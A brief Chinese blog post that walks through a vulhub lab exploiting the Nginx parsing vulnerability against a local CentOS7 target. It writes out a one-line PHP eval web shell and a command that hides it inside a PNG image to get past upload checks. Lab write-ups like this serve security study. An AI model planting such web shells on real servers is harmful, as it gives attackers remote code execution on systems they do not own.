一、基本信息
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40
二、攻击过程
进入 vulhub 靶场相关目录,并启动环境
cd master/nginx/nginx_parsing_vulnerability/
docker-compose up -d
浏览器验证 IP
制作 php 脚本(shell.php)
<?php @eval($_POST[“123”]); ?>
将脚本封装进 test.png 图片中,生成 shell.png
copy test.png/b+shell.php shell.png
上传脚本
解析成功
作 者:PeiyuJue
链 接: Nginx解析漏洞 – Candid Chronicles
来 源:Aaron的博客
版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!